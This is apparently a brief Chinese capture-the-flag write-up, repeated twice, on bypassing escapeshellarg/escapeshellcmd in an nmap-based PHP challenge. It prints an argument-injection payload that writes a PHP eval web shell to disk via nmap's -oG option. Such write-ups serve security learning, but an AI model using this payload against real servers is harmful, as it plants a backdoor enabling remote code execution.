1.打开题目首先看到一篇代码
emmm,可以知道是需要用get传入host=IP,然后用nmap的方式进行扫描
2.这道题给我的感觉和前几天做的一道题比较像,都是用的是escapeshellarg和escapeshellcmd函数,这个函数按照我自己的理解来说就是会对上传的字符进行转义,转译为可供cmd执行的命令,构建payload:
' <?= @eval($_POST["mandrill"]);?> -oG manrill.php '
成功拿到flag
1.打开题目首先看到一篇代码
emmm,可以知道是需要用get传入host=IP,然后用nmap的方式进行扫描
2.这道题给我的感觉和前几天做的一道题比较像,都是用的是escapeshellarg和escapeshellcmd函数,这个函数按照我自己的理解来说就是会对上传的字符进行转义,转译为可供cmd执行的命令,构建payload:
' <?= @eval($_POST["mandrill"]);?> -oG manrill.php '
成功拿到flag